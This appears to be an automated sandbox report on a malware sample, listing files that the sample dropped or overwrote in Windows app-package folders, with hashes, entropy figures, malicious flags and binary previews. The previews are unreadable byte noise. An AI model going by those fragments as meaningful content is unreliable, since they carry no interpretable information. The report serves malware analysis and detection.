Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.977002589571649
Encrypted:	false
SSDEEP:	192:XEhgcadnWFXN+Y+CeoWUpTsWvwrY2OMDAXw+IZk9d3xt:XEyJncUCe9Rqw+kKNn
MD5:	4FB69D12E6171319486C7CCB82CE532B
SHA1:	B1E303E2D4C87EDEFBBB94753CE1C49E3C197320
SHA-256:	A6D2D16ED33492B62F168ED9148510ABA3823AE9AC101F95484A1C056617373B
SHA-512:	550B4AC7FEE9FD2B796C3B2503ED496BB93BA34C20682F9D33CBD872EEA0918C18FDF08E4ECCE45AFDECC54C2293FDA5F29A59FB0BAE07748AF311B07567EDFE
Malicious:	false
Reputation:	unknown
Preview:	regf....}l.[...W.+@....YK.. .4...$..>....X.X\|...Z8x=....J.7(mG.....s.s...{w4.Y$18..Tn?}......,tGh>.....8#.qgJ.A]..~..9....J!...O.... ._.O.....J.+.."0.U.1..!AGo./....D.-........M...i.\-}NuZy...G.!.....R:\|Nh..c..ch$t.M4m.z..TS.$..8G]..........x..E....o./d.W........4.P.....6....\|YL.rj....K}C..D.i...t.5.sf..t@.......E..O.Hu.z...p.D...?..r..<.hNg..N..t......Pk..a.j}..B/.i..H..g..&$...g"+mE..R..........`..r.....;F...y..p.:kXI=<_\H...b.Tm"".........?.p$...k...=...q....B.r.....WqH......]e.BhM...[.0.....C.pj!r.....h......M^]=Ej...G.[....l,..?.R....Y...z[...Q.\|.v]c...t.I.D7.a...G..Th..U....).O..1M.k..........h....Y..Z.`....(D.E.2.....v.C6\J...)}.(M\]..../9.....).^...........)....k.........X.z:..mM...14..p.g..<)...?.. ...}....~.....WY.i..L1bFbi]bEX.Iy.p..{..J,..(lx.:q...^...)...t...m12...bR..{e...H..c......].nM..iP.u!.H1.....X9.... 5o.P=.........\|F....?[..b.c......k e.c~..;K`R.<...........@.[..k.\|CZ...3..C.*..N......XF..0U..G).z.._..

C:\Users\user\AppData\Local\Packages\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.9798112637822
Encrypted:	false
SSDEEP:	192:BuEKkdaoKrvewG/TTxoSQk9h6Vbp73bP/cOh:f15aewGPx1QjVFvP/cw
MD5:	6725BDA38C33D0BD5D48458D0BB4BFF8
SHA1:	2DAA7B09253F8199D063F7477348D0E1A3612C78
SHA-256:	3D0678A5206A6249010CAD5464715423F5F18835781952EC0F983A1DA8252318
SHA-512:	3768A1C2AEAC9CD15019E39732A9FD3B219A2B4EDFE60BFE3FD70969DB1767D1E7CBEF4F6525D2D6424293E55BDDDF9443BA02CB9EE49F576F1DF3191CA6D6A7
Malicious:	false
Reputation:	unknown
Preview:	regf.......@.P.7"..X5..$..O1]..Y7!..v..Rt....2......T..b.....Vj.+..O..#.].)....y.k#.z.kEs......=....[1Y4.`...[C..~...S..?.-i.Ed..;.7..q-.G.$e......id..y-},.}E.^%.Jn..o:...c....Q.+=.tFE./.}N.x.....A>.v.~=..=...q..U{G...U..6.!......&C......`.d.o.U..v..._QQ..~{.5..Xr.v3.g{..'...~.....'..@2..%...J.....G..'-@y.....hvh.b.;n. i.......n...4.p...N.9............F.. DO..s.."9...!h7..R.......3.....b....A...aN..A..f....G.o.\....~#/Z.o.4..._.\|Y.4..../+....R..^.n.....mU..4Dex_.."l..F..).^........).......g+n........d.#.1...."'U06@..D..UB.-c.2.q."m...Bv..^IC...w+...h.3E._...zW,/r...ab>....//.m.......%z.M#.g.y.G.W.7...L.]..4.sF....... .._.:......."yo..N.[...H....U.....~.v...?>../l..z[....)_...NZ.k(f....DQ....&..K.Y.._W.mtQ....g.....1..C.k..JBBX.U..j.A.n...vA....8?f..........u...*.bpu..vdxk.......#YE......a...\|.@......<`...S..1o..d..z.$e....F..).rVl .0B....[yZ..O`{..8(.mZ.s...D.v...E.Z...@...\vNL..D/...N.v......z.....Q......?K...k..Q>z..XJ%Y.3.ec.J..p.s>....z.O.4..

C:\Users\user\AppData\Local\Packages\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\Settings\settings.dat.LOG1

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.972034587365535
Encrypted:	false
SSDEEP:	192:ytFu288ugwGWRfA4uvQlv0mDw/drge8M+ZyhD1YZZYKlzhht:T86NK4uvQlv148XMAzZYKtt
MD5:	207E46EFC8825F24FB72D053EB1E03E9
SHA1:	EC7EBF7A0DD80D1E86151930F12B661B706C3087
SHA-256:	FAA535920529CF0A67524FD518404626BDDE3B47640B3B60C6EE774167CA16B3
SHA-512:	1937B343E4AD0C15F0335BF965C8B96795A2763FCCF8CCB1A6FD7DB97CF784E4C0EF9A41898212F5039E83C1A5BAD495447926951BBCE36F2F334F4B30F04778
Malicious:	false
Reputation:	unknown
Preview:	regf.:.d.......G.s.a..... Jo)..3cN.Tv....(r..<.....L..7...dl0.Fs..._...m.)z.36...4`.R!...<k.u....".q....}... .A/+.+.lG2>....K..py....bq.Dq.5zX.....,c... bJ..c.[@0.....ihk...#....\|...nK.m"."'E...,..f.6;y.d.s...v..d[.W..%Udm..`M...(..oa.c.....A.....u.x.Vf+.%..Nz....(....6...Fd.a...j.SjB..3W&...N.}[..D..~..k0.ub......n._.pjV}..G.......^...4Z...._j.i$....c}.`....xl./.s.m.K...+...g.+Y.~$...~....h....R....q.V.#..5.........s.]..........[U.F.%.....m\|."..J{.2.kL...c7..s...b...kv....p...C.....{..RYau>.....4\|NV..+[.,"n.y.,]Y..^!..u&-x.Y.r...Kl9.w....=...r\1W...z........k... .........i........J..G..._.....$j...Y.f.K8..Y....n....M.Bu..(......0...1#..Z..M.zK.0..7.......:.i.3(......0..WH.N^.zg...-..............z....f.....L].H.G..s..~...p..2...o.m.z...7mNM.(B.yX...~Mi.'...d.x.?........c4..Mh{!...}t2. .rLnO.Qg-7....y.D...Y..(..4..H........F..]......#...,T/......=......:Nj.(.........2<>.A......>...Q7...Z.v......v"./.....%............B9....E..l..om.s\.

C:\Users\user\AppData\Local\Packages\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.97972423658612
Encrypted:	false
SSDEEP:	192:lwNDKobT7QjxWCKoQfKTRc2z22Iq25iwteOLSNUdv:SNTbQRKjKT22/DsiROmWB
MD5:	C2C6D8D4F1C3F7C07BC1192C509785E4
SHA1:	5E8BE64398EFEA0E6D4453F613FA510D5CB34DDD
SHA-256:	4AEC28BE58E23B73668C530E3E66E3C35DDB34251168BA7003B7FE675FB446BA
SHA-512:	077E5AA79C0E8E11F526485C847DE5BAEDDD672AB7CDF6E017AF93D634FB8155131F793C2C6C3A7AA3ACED0C329E34BC51EE6FE469A454BA0539E76DAE90DD68
Malicious:	false
Reputation:	unknown
Preview:	regf....Q).w..M.4..e.........n...2...V..u\|.tI.`..V...#.^.?flu......(...j..Q..v.II...a.x.....i.K(r....G`..,..r.j5..0"2.L.d6b.H.ql.T.9.....Y...M.........Ti"Xr,D^.X..Ji>Y.....s].lW=.>ySO.W.........?...J9.@..4.x?.$S.....o..Pk+.....d..X.....}.~..~......l.......^.H.Vg.......K...P.......w...8.=~.^..k....X;.I..z...E....T.[..(......q..3.Mv?S.x.=.'..V?7.._d...u}..1..\...]....7.g...;........4...Q..]..B%.?..<.<.-.G.[....PR.d..$4..>QS,.A..,..o.17.o.._.:..+L..UNo}S..kZo1V.^......>.......b..&.......A..m&....A[.DM...0...Y^.%.q^..L.r..bNN..]E.}.O...ZE.f....?p.F......4&/\o...........tbh....8.w...3.a...l....J....)..+.g).A...(..3...j..WL:.xNA....zb....y...n.c.;..3r.....m+.^..v{.....5..r....W<.........v....H...W../.I...a.....^....g..A......M."/..EC4P.j..\....S#.%.Y.&.@.'..:.....L(h..E.F...;?...U4..UV0..2}.H1...X'.....P,\...r..t....?r<H.....Q.....F.........#..3.R.y..g".k.< {.....DH.1.Y..i.l...Y.v...Q..u..D.p.\|.M.....L8..@....s. ..lD.....uT....r.Sc...X..6D." .

C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.978530030793618
Encrypted:	false
SSDEEP:	96:i5CQgwxUKAHAXPTt1guYI59MOZ/7g5s/zzIXmikKFOy3Wn/VWM3LPRBFvRGSOUr4:qlxvaAXxrYg9di5s4/03toSOUEuwvNDt
MD5:	D6226FC8C426612AE32D6F59EB2CB0DA
SHA1:	BD33E90817D8307B376A884F3A149A8ECADAB142
SHA-256:	68C975A967F36F22025EA6293F451660B378B033C53CAADA3FDC08606C7E8BE6
SHA-512:	60AD0FF63F10A677FCA8BA3EF79B5CAE4FADD89FCAB88B3E14FE110C6A2FEA700F2A4150208038FB3D445793935E450CC7DEEC3AA53DEBD38811BFDBF3EC82C7
Malicious:	false
Reputation:	unknown
Preview:	regf.......a.L.O.u..-..Q.4.@....w....(_g9...:.3.....j>o7.i4..<.<.3.q3..MK4..a.~.....R....m.j.\/.......F....P......../..6Q.F..T...=....:..z..6c.....U...E..'.w..J...\|I.5-Iy7N..a#8.......k..v......\|%5(e.y..AU..T.)!...36N...1x=.Z...h\.w0.#..&.U4.x.k....L.(JQ.B.../........i]D,.&.eo.&.}.t.O.7...3..sEI.<. .`La]..1--[a.......s....K..G.3.e..........\|d.g.#.[.l^..].>......._...I.)fW.2..9W"......P..P.!.0..`Z_.^N.&..y..i.L....&...5B...W._...n'.JpqtW.J.V.._GA{Q~.awFKFL,.@"18R.c...e!4.g.......W.p.V?..../.[G..uJ+G.`4........h.=H}..2].B^l.nxP....RN6..:Ly.%.9...,.\|...U..ny......S.8......TB..1%.x.......O.K..+O.....d.+.U.F.}.......S.>...{GC..L....._..x...y..g^d..e.a..4&U.7.+`..ITV.7:[..%.:W.`.........q...z..-..c.. .Z.....kr{0XRl.P,,.Q...)X.M.}..iM&.V%....F.t.]R.L.....\it&.A...o........g..........3..H.....y.^F@..0_..Q./.....jBk..yv\|....p}.y...D4Q..p..p.........h..DK..+5!+.$.....k ..t.."O...t..8...=Y.....\|.P.V_4..0.paR..s.1..`.5/8..)x..z..O..<.C..6.

C:\Users\user\AppData\Local\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.979222428434112
Encrypted:	false
SSDEEP:	192:oXAnhUba3usflkhYbb5U33L8CHDbd1prdleQiBAH0LxneIfrc1:uAnh8huuaGpl1V7/vH8eeo1
MD5:	6907A719A1CE7F5163C467E15A4C7F56
SHA1:	C9827B8376E6504A6D27911F20040F5A86A87BBC
SHA-256:	3BB90C3D93BF10F7906894E0E7E5D7E9DF4A23ACBAB70D1F13417C6357F38FEB
SHA-512:	487920E1B9C8EA09E27790F8E87D8C1756C25633CF86AF9E6698208EAC31B77055CB1C792459A4728173409B37DFC3BB1A5E9AEF9C5D7E818ABA9739F5040957
Malicious:	false
Reputation:	unknown
Preview:	regf.....t.....x.Nsbqb...k.....s]....._...........6H...Lf...G...G...e......W$<......#5.#...J....c.k.@?.!..7z.f.}!..f..[Qc..O..1.....O...D"..n.h...6.v.ob._..k.{d.L...0..1..\|.....a....._iK0.z .v.3....>.'..L.kM2L........TT..=m...\N{;&.h.y..WA.........O..x...&..X.QAF._X.a.H.AO.jb..=s........".........U...?.t....@D....E.V....qZ..@jfh.e.N....A.\|...4,..8J.z,.N..O..T.X..%....be.Y.G ......R...5i.O...`..........j.C..;.'N.!lT.R.;..S.z.v.....''5..N8a....!...A<?..O.......N....q...=m..Y...-@.(..w.\|.5.E.c.+.........C..,...X..W...8T..$.{....&1.!...i...=...hRCJ(..Nn..;.S/....P...H.aY...\KR..=.%-....\S..W..;$B..9...l.u..&.R.7Q..\|.-O.N.O....V...0+..j...B....@9.s.7...,.K..]H9.O...X`kd....P...K.....k4..1.M..=.~..[..P...b./...'T.M.i.+.u..c......QCS...?/...:...... ..J<.....Pn.4.(-.S..f..^...% ....I..4.Y..8c...b...p6..%....V?....K..'.#.$...O.7\....+.....}.\|).Nd....b.....cHJ4b..=.}...5......wI""3.1\|...?6.L...G^...s....-B..p.r.x...H..};!c.sM.g."*...Jo..{...Bg.{

C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.97847450323752
Encrypted:	false
SSDEEP:	192:e61lVeaXXtTDM8h4m+VaShYhKhJW5UAyGPHVSSmR8CGSJYOT7O6hn3u4AFE8vFNE:euTeaXXtTDMRmXIIK/W5xyGfVk3GSJrt
MD5:	41A71A603F636E3CDC578FD8197C30CB
SHA1:	3A4CD71632CEA6CAA09BB2CDEED7FB626072EE1D
SHA-256:	87CC7199A2769AA0F17E520056F19866FCCA9C1234C8F365705E186E34C603D2
SHA-512:	FC44FCF259648FAEE3B4C5FF276B14FEC53D983172897AAD7D3B7F42A845DF5A590D59718FECCA2A867A60754B6AD8783B096570A8AF9F2722CC3902063C4AB5
Malicious:	false
Reputation:	unknown
Preview:	regf.R.......`.`\|}.EntMB.NZz.&n.E.[...U.H.......d.`.[...0E:......uF...2O.H..\|-...o......T....b.)z.1.M.;\.............7....,.m.....C..Q.&5..5..[.']...6.@.c.....4...}...;....(%..\|...cY..[..c.&u.D.}e......S...R.-.t.N...].(..r...{2....l.ZJ..~V..4.h..U...z.m..^.q.~..p!....M.#.I~..K./c1=<...1FzT?.u...v...~N..}..}0.N.eK._h&i#"!....w..i3r+6..ak.)X8....8..ii._..\|...t..V......_.&...y.O..O.<....,v...@...5......h..<V........A.lI.3..}.dp....?.j.Q.-.........e.y$.....j?.0.Xi/h.$.X..4....v.....%4N5>t..........&t...Ozk.r.3..R..+....'.Y....jKF...I.E.Y....t..........7..sl*dP....\|.<I.R}..DFd[.O..y..>..G........._U$. .E...&...)@-?3l.%y..N6F.u....oKC^.......Z.#MA.".:h....V....&.r....v.dP..{.aL.4....E:.`;.I....4DK....."eMs..0.FZT.....F-\.-.b.....?....b..,..1u..32.....\/..D..W;.3...0.Y.D.C.=O...b.$...}.V...yW?.N"T..D{.C..I.Hs..`7'!.+N.......!."tr7...........3..<........+......7^=+.H4......._Tv.4J..I4.."a."..7.t.\.}.'.#>(.7.23.....e./..e;.m.B.r.p.P.t.?u.^....

C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.974835813437781
Encrypted:	false
SSDEEP:	192:vjbQwoeJeep2TiASbvn8v9TFIZdMc0V1+7kJiLZHx7Y35lNdVeQIcaz:vlRSTFyO9bV1piLxW3bNibz
MD5:	EAA57B78CD1EB9C52518A032C6536005
SHA1:	0087224D5F459D44C3422A5E4A4B68EF7DD25C8A
SHA-256:	335E34928BA330BA952B357FE387DFC5E347D3350D41F880AD8C438B3AD22D9E
SHA-512:	6E2438FD36280A81BCCDB6176E44D7EE28F09551D857D46114BBC11E49619B4017EFBA60693DD5A12B8DE190D6EE999999DF58C672469A4C8800E282CCE35BD2
Malicious:	false
Reputation:	unknown
Preview:	regf...B.Q_..:y.}..Ld_....`mu$8..Y.......uAfu.mL.<..[..Dd._.1.......a>f...r..'......{....1K.v'.'.~\|....{.Bi..rs.......j...lQ....\.._....+_>...,...G....u/.a.{].H..V.......~.W.z..z...E.`......s..... &.v.E9t\|..v.....L.D..2.kQ..>..[.g.r...'a..I....<O.m....Q....?0....X.'.].$......T+...@9.2Kw.C...q8.....I....60x$!....4.2Q.....U..Q.$.j.....8}.............X_........M1.)?^..........].Ea...p;....c.....mny_.K....$6..].r:....."o..<.h.cGtg.6.B...U...4eJ.S..:?.J.&.....m..^...B.,QA..$....J.w%.kL....&....J>.N.ET...Z>. ~.".!T.B%}q.?.i..._n......:..x.:...B$$.X........n~6....K.&T.]!XP.[*B...{.M"7.5_.i.}.A3LhXZ....fG...d..tM..........UJ....X....5.W....(.....e.9.Clxqt...B`.....GR<...g.E.m..5....[...Z3...P..2..(.%...`......{,K..AS..j...AY..G..j..A...jy.F.{....c.../C.5k..pAd.....i.;..M5.{.......g.C...e........ne....Kf.....H.\|.....{..O.M.n.V..9v.........V.o.&(&..D...&.A...A........#.V+!3!-!O.c>\|@.Ap"..J..S.z......=........m...m.....?6'..v..`L...\|5.o.J.I.T..

C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.978221097808172
Encrypted:	false
SSDEEP:	192:V86Na/BVp7+s3pmHEeFYZB633LcinEZx76y2jMDUPHraxQTsb:xyVp7+44/pnEH5DoUQM
MD5:	FC4C783463633CA9F6084C7BD97E5995
SHA1:	3593BABEDD72BA9DA3635A92143A31D7BB3F1AD8
SHA-256:	A0F05441237367E258B4DFFF2DCAAC0BD363F30336F878BE27FAC388C7764AA7
SHA-512:	9AA629FDF69E35647B2E87E359DFD9C3C725DB82CFF4B52928902E9B60F0B46E0EFCD56C72D8E1CF9929D1416A8A8F43AE8B20493CE66ECD9720CDD3E4EC6DAE
Malicious:	false
Reputation:	unknown
Preview:	regf.2...1^h.....<..(P^.A....j......X..DJ.^Y.Y....c.8....yz..@P..}..@]y..g..HN...%..]N..I.:.JY....h.Y....Vq....&..HP.P.e.I..t...y.g...(M#....i..J.D$0.j.d....-..\|ot.A5'z.(>n.p.}...^O.A....T.............b..(....T]D'...?....ej.....;.f.~VB.6..b.......#.}\.D..\...M.+..qH.`x.._..cP..:...PQH...a.N.]N.;...nl."}#1'.....!........I\|d"`..u.....\|.1....)n....T.......,:.=.\|.c.^:Q.P....\C.q.c...........x...Ok.7..c...x/y.h..{.\|w.f........6,_}m./x)f<.Z...ISi...?.+l.......g.....dh.A.vc9.:R.....{.....l....u5d.M..U...~...... ......n..~bA.%?.0/.bB.+...R..bT160..\.F.....<...U.CR............q.&d.....4`I..J'.9:.nf..%....:.S...k.....O$..g/....v.W..bV...U....QW'..>g..h.u..OR.JS..Xr... .b..l....v..X.,/..0.Iu/6:..=.'..k..^)j.}.y..{.&.6c.....a...?....O...3..R............)W^... W...H(...fAPT.L.....f..y...6..R...;......W.V.FA....f.O.....2..f....p........*.`.."...r...]\.......oh.`.P_...ff\.T..._..s,n....S...%,..@P..<.?....1........Z..G.7.....":\|.....\|..v7.S

C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog.etl

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	65870
Entropy (8bit):	7.997386421675592
Encrypted:	true
SSDEEP:	1536:wvDbJniPfaSnF49l/PbQBMrYT+MZAlzc/BkNmXXEbdzJ:wvDNu1FUBi+QAlzqBkNfb
MD5:	A808B01C3F14773197BC1530DF1EA420
SHA1:	E71DFA3FE644D74CD838FE6777F408DF84584E67
SHA-256:	2996A068B5CBE18024A1AE9318D6D39B3D9894558EDA619B907507BAA0E9FAFA
SHA-512:	5AF5A16266907C89F20F5EC6F17496F50BFA1DA6EA0B74A1FE1961C82F9B9DA79C5E695C1518DD81B2E9A9C5A1E69F6408BB141CE9543BF7E27EB14FD7DFFDB3
Malicious:	true
Reputation:	unknown
Preview:	.....u.....n.[...Wc......8.=.;=......i0L.Yu.c......o<...5Vkr..A.]g..]u....o.y`...X..........-H..............N..Op..<..}A'M$><...i.S..........Q..y.~...o-.W.o'.lf..O.c.......R...d)..@c..;...?-I.p.g.......@4o...t...e..1^.w.S.Q....zhv_../.=.'....X..p..v.ul.e..<......M..d....<.......HDMr.1.q.c...j........x...{..../....7].......Jq.uG<........."sR...wq. 5.Hs.r......F...#....a......}........&..#._.<.y;F...{.(........UYs..d...H@.v.x.y%..}.....o....5:..{."_..9.....='.\i_.3!..#.=[......x.[vq!..I)...u.Z.R.a".....)u....[..E.K.@I..._%.6.._..M.a..e+d.!..z?.{........V...w{.!c.....7.m`...q..@.'...Ln.O.P?f.c..%...o..wR).....x..2@..!.'..!.M..2S.WZ.>u.[...X......e..,.CJs.2.}.-v...\.w.#6m#2_...{6.........F.1\j.x...uI?.<..._......8M.s%..e..M..H..."4./.V.).tFI.....h...=1.....M?...=............E..W....<2...A.Fv)...r.0..\7$R..~Ze,....z.....Y1....^Mx..sM?Gw.(..-.6m*..K.)_.\Y&.sDT#..K....7.........C=..ve....!.p19...r.=s:./...!...BE..J.Q..-...q.......

C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog_Old.etl

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	65870
Entropy (8bit):	7.99703999482378
Encrypted:	true
SSDEEP:	1536:qsWjNBAbsR60AxCWNMx4b+xFjEO69d6XnV9xKrlRueDDni1th:yNBAbsR60AxnNSx2O69d6XnV9kLfDDns
MD5:	B9B142C81E342B3C786E402E5ADF461A
SHA1:	D00B53096854391EFF970FC6A1619215D5F17A24
SHA-256:	A1C3726F5E9AF5410BD54A0DDDF1465141F2834436CACFB7396AA6E3C24BDAEE
SHA-512:	3817796F1D1A706DA8F0D79395277EE32836A3E5B28AC2D7E1304B64F2B59C6EB22738D4482E115768A55806479C7C458997EAD2A3309F50071DFAABE868B41C
Malicious:	true
Reputation:	unknown
Preview:	.....r....f..F.\......c.lU5j!=U.?..e..........&...f7.......Dps..z...)...T9....6j...E...0.X...g.h..f/..B..!U.L....@H..!....$..`..`ej.Z`?."F...bn.<&..U&..d......6..............J.t...U(...s...:.U"d.e..D.k...Y.Q'.......@..J...4........l......1.cW.9..;.\|t.#O..pT(.0.}j%..;j.....d.K!..f.d.......q..bz......).S......_..A...w...S.......c..D5gt...}..5.NtU.8(.."....n.L.l.sN.......y.ntm....M!....{/.. I7.#]..$\|B.....Lq.j....eE..vb{..{..D(.c.......l.`"...w42.>...u'....'..?y..%c..R...2.C..z.f.Y.!U6....].{L...1f.l.=..R49....0.v..\...X.54\|...C..t.z...N..dt.H.}.qR.F.y.(Q\.a....1f4.DR5.......k...3D..}L......~"$.....>.w....b.HA.W..r...).7.....S.'+...T.._.nGw$...$..m...v...9 ..Hp.X.#...Kvr.......B..^.}..............m.C.'..cBXZ...].p...EZK"zQ.X.YW+...U.cC..pPe).H.....e+.E%.l.`..rb......>..`UZ9.&.t...$p.C.n.V.Q)z5b...mw+S...7.bS...Z8....2d....=.9.E/.0..d....Y.H[.......6=.Y.G.n.....wu....W./.l@......B..c"Y..Bj.....!.....P......-......;I.d.y...C.9?..o#...p>...T

C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxStore.hxd

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	4194638
Entropy (8bit):	0.8519585694447254
Encrypted:	false
SSDEEP:	6144:sDrkQNu0N4YsymKPlSxRNp8/UMRT00TSuEbU:sDrPNu0qYsymTRiO0V
MD5:	787FC419A3408A6D11A6D8F81C642001
SHA1:	FB978EDAEBD1383139EC988DF670871B7537FEEC
SHA-256:	3318FC1BDF59CF91B39C448F70F26B87503BBFB8B7F87C84C908FE7811635C76
SHA-512:	79825855E1E11158D767C3688AB4F4FD444FF71192886B5E407EB4B67D73C2D72595FDC5B6EA86EC5CF87BDE82AFE1DDABF7F9F8CC90A03AC68E0BD02C3910E9
Malicious:	false
Reputation:	unknown
Preview:	Nostr.pR[...>....._.^RX.6d.>...GE#rc,......^.`..z..<....~.'Gqo.N.m1H.+X..d....~...e\|..I2.Gr8/"^L.~!JtK...?..q.(....-...^(.=.....0?.....R..Q..M......~.....D....%..w......i2.C...N$..tc.H...R...dd.2..Ef.ZL.w,...}....8....d\h'....`...T.@\.tXVA`$.K..q.^O...Yt\|.FH$gz.....z. .B\RZ....2.s...(#.y./..!...Q...9'V..t...x... .'c....Q\.Y..^i........M....bE.p^5..).#.....,_...8qD.J.....y..g..w.K..../.pI.....I.s.-.......e......W'..0T../'.<$....1#......).......u?N...+.%@..2{.vp,!..b)yx...&...}5^.a%A#W....-..&..z.`..^.@.m.9U.s......0\=.:....Gg`xc..: ......aAW.R.....2...r..P.5...#.#..F..s.v;.......l..8..U.A.E..G/u.~r..p.\|..m?3Crt....q..1...AQ..m..2.Y..e:...m..[.Q..,..W..t...."p......d...v.7i..-.v.f..F.IQ.Vtb.9.i.....>Z..-.......2.....6..v._....+.q..B.G..\......6...*..T,..k.J;..#^]~1.P... 2...L..p)...j.M.#..,CL...0.#.t....g...%.`....[>f.....H..\|4e....0.W@.....+,w.$T.I...e..!..S...%_..../..TT.+u.....C0..J!......>x.B.~R...f.....V......dh...\.]]...4]rT..}..

C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	16718
Entropy (8bit):	7.9889432458291205
Encrypted:	false
SSDEEP:	384:Gmx9O3HgfrX1/egE7ExgmT8nyANcleHuWjg5a:GmmgzlWgE7ygmT8yAOwHup5a
MD5:	8A5BD599CA036B2108CEBD457F21C5B9
SHA1:	BF4933E5E46C41FCCEDD120D66DA33449D5554AE
SHA-256:	7989D9DFE3EB180AA86CD51169C6095824B5B8FE00CB7E7208D788EC6CCD4230
SHA-512:	EB90D58724D2814A208117E75B04BCCB6C92AF18BC98015C42625D469C3A3124F92958443CA3781CFE8DA215697757A0FBDEA396D7D3BE55DEDA97CEE5B3C605
Malicious:	true
Reputation:	unknown
Preview:	regf...;7....Q.Z....jh.N./b..b.V.=.....G.....h....t....(.?7...Y..}I&.. 9t=......MF..R.0.u..I....%B..a..Y.....b..h.i...s$._.d...@...1.q\|q....zr~i..."..Wz.K.P:}..;...hd..k.,..B.[.B.[....+fD....../z8%.sw:fXB...Eb$.H.tT.....]....#..u[r.(W.+.h.w...\.:.i~..U#d..0..o..7..?=..E...{[...F..\...QR....J....1KHCN+5E&.q0r......Y$.n..V.).)....Y..... ....~p..ubkeX'...8...j.~mhe.J...W.#....X..1..A...ov....U..x.iva..g....._......t..U.....&`.!*..C@`.i.=.....t..H)1.z.?.....E......=E.......&...1...T... .U4...7X.F.U.....((o.P....HI.ib.(j..f..c...0..7...1}..4..\|........ks..}.j%...(@.E.=..q7..a..=G.._.r..%..4..G...g........8....<.z.4..[.v2.7..`....}O.>..u..yC,....6Et.s)tk..lk..X(.MA........9@.m.q.s....Y...^.H4&..l+..^....p.~-..\...n...J...[..... ...5._....v......^."......W.w.w.b9Ub...Y.q.24...\n.......i.....C ...m..~g.&.R..oe...n....1~\|.0..d.y..@........_nr5F.O/....JL.>\...-,...yo.........>.....;..\|.m....#..;.F.O.v....{.2..;..Z.4.k$..=9k.....It.....P..(~/

C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Settings\settings.dat.LOG1

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	33102
Entropy (8bit):	7.99501738601158
Encrypted:	true
SSDEEP:	768:Fg9P9B3athsjC074sfzXCUGpvQcn85g8+Hf01j0//:e9P9B3aXN07nGQc++Hfh3
MD5:	FF9B78DF287260FD88984F4DF43E18BD
SHA1:	A22FC158095A567861E90A3FDA049C9699C4CD96
SHA-256:	3F5F09005891702FAEFA53AFDA80D57B675E5AEA6C32FBCD61A1B8CE33CED946
SHA-512:	F99DAEA2ED5F4101D4954218A0B74CBC2BA7F6222E24EE24BCF1B0544F6F664650144B7E6D86760F430623AF99BB814B94A4E1E4E7E5FF4EF00D4D57E8C0A1C9
Malicious:	true
Reputation:	unknown
